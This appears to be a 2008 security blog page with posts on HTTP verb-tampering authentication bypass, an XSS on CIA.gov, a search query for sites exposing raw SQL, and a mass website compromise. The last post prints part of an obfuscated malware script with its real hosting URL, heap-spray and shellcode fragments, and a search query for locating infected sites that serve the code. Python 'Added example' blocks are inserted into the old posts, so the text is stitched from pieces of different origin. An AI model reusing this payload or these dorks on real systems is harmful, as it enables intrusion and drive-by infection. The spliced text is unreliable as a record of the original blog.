Curiouser and Curiouser
Acidus
Current Topic: Technology

Amazon MP3 Downloader
Topic: Technology 10:46 am EDT, Jun 27, 2008

I've been loving Amazon MP3 for a couple months now. It's just so damn easy. I can find who I want, move it back and forth between Linux at home, my work laptop, and my iPod with ease.

The only thing that is annoying me is Amazon's MP3 Downloader. When you buy a song without the download you just get an MP3. When you buy a song with the MP3 Downloader it files the MP3 away nicely into a directory structure in "My Music" and automatically adds it to iTunes. Amazon is doing some kind of detection in the browser and serves you an AMX file for the downloader instead of a raw MP3.

Only it seems that my browsers "forget" about the Downloader after every reboot. Amazon goes back to giving me MP3s. I'm not sure whether the browsers just no longer detect the program or whether the file association is lost or what. It's gotten so bad I just keep the install file on my desktop and do an uninstall/reinstall every time I need to shop.

Grrrr. I don't know anyone at Amazon, but if you are reading this, I love your service and please fix this issue.


Bypassing Web Authentication and Authorization with HTTP Verb Tampering
Topic: Technology 12:46 pm EDT, May 28, 2008

This is a cool paper and all of you should read it for many reasons.

First, because it’s a perfect example of hacking. Hacking is just critical thinking and understanding how a system works. In this paper, by understanding the nuances of web technologies, the researchers found a very trivial way to bypass the authentication systems of many popular web frameworks!

Second, it’s a classic example of how programmers with even a little security knowledge can make big mistakes.

Here is the paper in a nutshell:

Various web frameworks like Java EE, ASP.NET, etc., allow you to configure the website so certain directories are only accessible to certain users with certain HTTP methods. So anyone can do a GET or POST to /public/, but only an admin can do a GET or POST to /admin/.

Enter the HTTP HEAD method. This is usually used for diagnostics and caching. If you send an HTTP HEAD instead of an HTTP GET to a URL, the website is supposed to do everything it would normally do when processing a GET, except that the HTTP response contains only headers and no body. To make sure the same response (sans body) is sent for a HEAD as for a GET, web servers simply handle the request as if it were a GET and suppress the body when sending the response.

Do you see the trick yet?

The HTTP HEAD method can be used to side-step authentication systems in many web applications. An attacker simply sends a HEAD to /admin/deleteUser?user=billy instead of a GET. The authentication framework checks, sees that anyone can send HEADs to /admin/, and does not stop the processing of the request. The web server runs all the back-end code that it normally runs for a GET, which deletes Billy as a user. The attacker does not see the body of the response, so it’s a blind attack. However, the attacker can see the HTTP status code returned with the response to the HEAD and, based on its value (200 vs. 500), can tell whether it worked.

This is exactly the reason why HTTP GET should be idempotent. In other words, GETs and HEADs should not modify the state of the web server, so you can send multiple GETs to the exact same URL and it should not cause problems. POSTs, on the other hand, are not idempotent. This is why e-commerce sites say things like “don’t click checkout again!” and your browser says things like “You have already submitted POST data, are you sure you want to refresh and send this again?” (AMP, we aren’t doing this in our web frontend, right?)

We even have an idea of how widespread this problem could be. In 2005 Google launched Google Web Accelerator. This was a browser plug-in that pre-fetched links on the page you were looking at to better utilize your bandwidth. Unfortunately, thousands of sites started breaking because developers all over the world were using simple hyperlinks (which issue a GET) to modify the state of the web app. There was lots of kicking and screaming, and I acquired a healthy dislike for Ruby on Rails developers who kept insisting that the rest of the world was wrong and they were right, but I digress.

In short, by knowing HTTP and understanding that a developer implemented a default “Allow All” feature, this very cool attack was discovered.
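As an added illustration (not code from the paper or from any framework), the following models the two ways a per-verb rule like the Java EE security constraints described above can be interpreted: the rule only guarding the verbs it lists, which is the default "Allow All" behaviour that lets HEAD through, and a deny-by-default reading in which HEAD is authorized exactly like the GET it will execute as. The rule table, paths and roles are constructed for the example.

```python
# Added example: models a Java EE style <security-constraint> that lists
# GET and POST for /admin/; constructed data, not a real deployment descriptor.

# Each rule: URL prefix, roles allowed, verbs it covers (empty = every verb).
RULES = [
    {"prefix": "/admin/", "roles": {"admin"}, "verbs": {"GET", "POST"}},
    {"prefix": "/public/", "roles": {"*"}, "verbs": set()},
]

def _rule_for(path):
    """First rule whose prefix matches the request path, else None."""
    return next((r for r in RULES if path.startswith(r["prefix"])), None)

def _has_role(rule, user_roles):
    return "*" in rule["roles"] or bool(rule["roles"] & set(user_roles))

def authorize_verb_listed(method, path, user_roles=()):
    """Flawed semantics the post describes: a rule guards only the verbs it
    lists, so an anonymous HEAD to /admin/ skips the role check entirely while
    the server still runs the GET code path behind the URL."""
    rule = _rule_for(path)
    if rule is None or (rule["verbs"] and method not in rule["verbs"]):
        return True  # nothing applies -> "Allow All"
    return _has_role(rule, user_roles)

def authorize_deny_by_default(method, path, user_roles=()):
    """Hardened semantics: HEAD is authorized as the GET it executes as, and
    unlisted verbs or unmapped paths are denied rather than falling through."""
    effective = "GET" if method == "HEAD" else method
    rule = _rule_for(path)
    if rule is None or (rule["verbs"] and effective not in rule["verbs"]):
        return False
    return _has_role(rule, user_roles)

def compare(method, path, user_roles=()):
    """(flawed decision, hardened decision) for one request; True = allowed."""
    return (authorize_verb_listed(method, path, user_roles),
            authorize_deny_by_default(method, path, user_roles))

if __name__ == "__main__":
    for verb in ("GET", "POST", "HEAD"):
        print(verb, "/admin/deleteUser as anonymous ->",
              "verb-listed: %s, deny-by-default: %s" % compare(verb, "/admin/deleteUser"))
```

Running it shows the anonymous HEAD allowed only under the verb-listed reading, while an authenticated admin is allowed under both.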

Bypassing Web Authentication and Authorization with HTTP Verb Tampering


MySpace Suicide Indictment: or TOS violation = crime
Topic: Technology 11:09 am EDT, May 27, 2008

On Thursday, the U.S. Attorney for the Central District of California announced that Lori Drew, now 49 years old, was indicted on conspiracy and hacking charges. The indictment charges Drew, a resident of O'Fallon, Missouri, with three counts of unauthorized access by violation of MySpace's terms of service and one count of conspiracy.

... ?

Where hacking = Computer Fraud and Abuse Act.

So, the DA's logic is that by violating MySpace's TOS, Drew was no longer an authorized user of MySpace's systems and thus by continuing to use MySpace she committed unauthorized access.

There is a good write up over at The Volokh Conspiracy by Orin Kerr and I highly suggest you read it.

A few choice quotes from Security Focus's coverage:

Yet, legal experts argue that charging a person for violating computer-crime statutes because they broke the terms-of-service agreement of an online site could lead to the ability to charge nearly anyone with computer crime. Using residential broadband for business purposes? A violation of the terms of service and, thus, potentially a crime. Checking sports sites while at work? A violation of corporate policy and, thus, potentially a crime.

and

"There is nothing in the indictment that differentiates between what is a serious violation of the terms of service and a trivial violation of the terms of service," Morris told SecurityFocus. "I would bet that the majority of U.S. Internet users have committed a federal crime, if the charges in this indictment are upheld."

and my personal favorite

"Violating a website's 'TOS' is carte blanche to an imaginative prosecutor," Greenfield said. "We are all felons if this flies."

MySpace Suicide Indictment: or TOS violation = crime


Rods From God
Topic: Technology 8:07 am EDT, May 15, 2008

They are a kinetic energy device like the railgun, but instead of using electricity to achieve destructive velocities, they use gravity. The still-hypothetical system would be comprised of two satellites in orbit around the Earth. One would house the communications and targeting hardware, while the other would house the rods themselves, each up to a foot in diameter and twenty feet long. To fire, they would simply be released and allowed to fall back to Earth (with a bit of remote guidance). By the time they reached the surface, they'd be traveling at a speed of 36,000 feet per second and carry the destructive force of a nuclear warhead, only with none of the radioactive fallout.

!!! ... !!! Dropping telephone poles on people. From Space! Damn.

Rods From God


CIA.gov XSS still working
Topic: Technology 5:45 pm EDT, Apr 18, 2008

In an age where JavaScript is so ubiquitous that some websites won't even load if you don't enable it in your browser, cross-site scripting hacks are everywhere - letting malicious or merely mischievous hackers create links that have some very unintended consequences on websites that are not careful to keep from executing other people's code.

Most are run-of-the-mill and hardly worth writing about, but reader Harry Sintonen writes in with a vulnerability on the CIA's site that THREAT LEVEL can't resist.

For those of you who don't see it after clicking through, notice that the links lead to the CIA's site, but display a recent THREAT LEVEL story. Here the CIA search box fails to rip out characters that will run as a script when the site tries to process the search query.

This story went up at 3:26pm, and it's still working at 8:45pm.

This would be great for a prank form...

Update: This is still working today. So much for fast response. Here is the obligatory memestreams @ cia.gov link.

SSL no less.

CIA.gov XSS still working


Oklahoma isn't the only one
Topic: Technology 1:35 pm EDT, Apr 15, 2008

[sigh]. Now I have a good answer to the statement "Surely no one is stupid enough to put raw SQL into a URL!"

The best part is that the "blurring" of the email address is horrible and you can easily see many of the email addresses of registered sex offenders.

Want to see who else is an idiot?

...

allinurl:?= SELECT FROM WHERE AND (sql|q|query)

... and watch the silliness.
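An added example (not from the post) of the defender's side of this: a small scanner that flags requests whose query-string values carry a raw SQL statement, the mistake the post is laughing at, run over constructed access-log lines in the common combined format. The log entries, parameter names and addresses are made up for the example.

```python
# Added example: flags request URLs whose query-string values carry a raw SQL
# statement, the mistake the post points at. The log lines below are constructed.
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic: a value that reads like a statement, SELECT ... FROM <table>
# (case-insensitive). Expect some false positives on ordinary search text.
RAW_SQL = re.compile(r"\bselect\b.+?\bfrom\b\s+\w+", re.IGNORECASE | re.DOTALL)

# Apache/nginx combined-format request line: client, timestamp, verb and path.
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def sql_bearing_params(url):
    """Return [(param, decoded value)] for query parameters that hold SQL."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if RAW_SQL.search(v)]

def scan_access_log(lines):
    """Return [(client_ip, param, value)] for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, path = m.groups()
        hits.extend((ip, k, v) for k, v in sql_bearing_params(path))
    return hits

# Constructed sample log: one request ships a whole SELECT in a parameter.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Apr/2008:13:35:02 -0400] "GET /offenders.aspx'
    '?sql=SELECT+name%2Cemail+FROM+offenders+WHERE+county%3D%27Tulsa%27 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Apr/2008:13:35:10 -0400] "GET /search?q=select+a+pizza HTTP/1.1" 200 812',
    '203.0.113.7 - - [15/Apr/2008:13:36:00 -0400] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, param, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip} sent raw SQL in parameter {param!r}: {value}")
```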

Oklahoma isn't the only one


Everything i needed to know about managing hackers, i learnt from my DVD collection
Topic: Technology 8:22 am EDT, Mar 24, 2008

Many execs will tell you the same thing about their role in the ecosystem, but what they miss is that they do not need for this to be a zero sum game. i.e. Achilles does not want to be king, and he certainly doesn't want to concern himself with collecting taxes. He will gladly serve as a soldier to a king who proves himself worthy. This ties in pretty closely to Paul Graham's thoughts on your super hackers and remuneration:

"Economically, this is a fact of the greatest importance, because it means you don't have to pay great hackers anything like what they're worth. A great programmer might be ten or a hundred times as productive as an ordinary one, but he'll consider himself lucky to get paid three times as much."

Everything i needed to know about managing hackers, i learnt from my DVD collection


The New School of Information Security
Topic: Technology 8:03 am EDT, Mar 17, 2008

Why is information security so dysfunctional? Are you wasting the money you spend on security? This book shows how to spend it more effectively. How can you make more effective security decisions? This book explains why professionals have taken to studying economics, not cryptography--and why you should, too. And why security breach notices are the best thing to ever happen to information security. It’s about time someone asked the biggest, toughest questions about information security. Security experts Adam Shostack and Andrew Stewart don’t just answer those questions--they offer honest, deeply troubling answers. They explain why these critical problems exist and how to solve them. Drawing on powerful lessons from economics and other disciplines, Shostack and Stewart offer a new way forward. In clear and engaging prose, they shed new light on the critical challenges that are faced by the security field. Whether you’re a CIO, IT manager, or security specialist, this book will open your eyes to new ways of thinking about--and overcoming--your most pressing security challenges. The New School enables you to take control, while others struggle with non-stop crises.

Go Adam! Congrats on getting this out the door! We can exchange signed copies at RSA.

The New School of Information Security


JavaScript from Mass Compromise
Topic: Technology 2:19 pm EDT, Mar 13, 2008

McAfee is talking about a massive website compromise that's using JavaScript to drop malware. The attacker(s) are injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code.

However, based on the vector the attackers are using (injecting into the <title> tag), the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the malware require you to spoof a Referer header to receive the actual malware. Here is one example with a little pass through a JavaScript analyzer.

http://b.njnk.net:80/E/J.JS

var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
    if(z1IlbQFl0X) {
        document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
        
    }
}
{
    if(z1IlbQFl0X) {
        alert(z1IlcFFl0X);
        
    }
}
function x0r1aU2Z(name) {
    var z1IlaFFl0X = document.cookie;
    var z1IlaJFl0X = name + "=";
    if(! z1IlaFFl0X) {
        return null;
        
    }
    var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
    if(z1IlaDFl0X == - 1) {
        z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
        if(z1IlaDFl0X != 0) {
            return null;
            
        }
    }
    else {
        z1IlaDFl0X += 2;
        
    }
    var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
    if(z1IlbqFl0X == - 1) {
        z1IlbqFl0X = z1IlaFFl0X.length;
        
    }
    return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
    
};
function x0r1aR2Z(name, value) {
    var exp = new Date();
    var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
    exp.setTime(z1IlbVFl0X);
    var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
    document.cookie = z1IlbYFl0X;
    
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
    while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
        z1IlakFl0X += z1IlakFl0X;
        
    }
    z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
    return z1IlakFl0X;
    
};
function z1IltFl0X() {
    if(z1IlaSFl0X > 0) {
        return;
        
    }
    try {
        var z1IlbaFl0X = 0 x0c0c0c0c;
        var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]
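An added example (not from the post or from McAfee) for the site-owner side of this: a check that fetched HTML carries the marker of this compromise, a <script src=...> sitting inside the page's <title>, which is the same thing the intitle: query keys on. The sample pages and hostnames are constructed, not taken from the real infected sites.

```python
# Added example: detects the marker of this compromise in fetched HTML, a
# <script src=...> sitting inside the page's <title>. Pages and hosts below
# are constructed for the example.
import re
from urllib.parse import urlsplit

TITLE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

def scripts_in_title(html):
    """Return the src of every <script> tag that appears inside <title>."""
    srcs = []
    for body in TITLE.findall(html):
        srcs.extend(SCRIPT_SRC.findall(body))
    return srcs

def injected_scripts(html, page_url):
    """Return (src, off_site) pairs. Any script in the title is suspect; one
    pointing at a host other than the page's own is the compromise signature."""
    own_host = urlsplit(page_url).hostname
    result = []
    for src in scripts_in_title(html):
        host = urlsplit(src).hostname
        result.append((src, host is not None and host != own_host))
    return result

# Constructed victim page: the stored title was overwritten by the injection.
COMPROMISED = ("<html><head><title><script src=http://malware.example.invalid/E/J.JS>"
               "</script>Widgets Inc</title></head><body>Welcome</body></html>")
# Constructed clean page: its only script is loaded from the body, not the title.
CLEAN = ("<html><head><title>Widgets Inc</title></head>"
         "<body><script src=\"/app.js\"></script></body></html>")

if __name__ == "__main__":
    print(injected_scripts(COMPROMISED, "http://widgets.example/"))
    print(injected_scripts(CLEAN, "http://widgets.example/"))
```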

JavaScript from Mass Compromise


Code Comments
Topic: Technology 4:55 pm EST, Mar 3, 2008

DOMTree.cs Line 84:

/// <summary>
/// recursive helper
/// </summary>
/// <param name="curr">curr DOM tree node</param>
/// <param name="token">Reflection Token</param>
/// <param name="locs">list of current reflections</param>
private void FindTokens(XmlNode curr, string token, ref List<ReflectedLocation> locs, string origParamVal) {

    ...

    if(i <= 0 ) 
    {
        //HANDLE CRAP HERE, which I should do, but I don't.
        //This is bad. Billy is a slacker.
    }

    ...

}
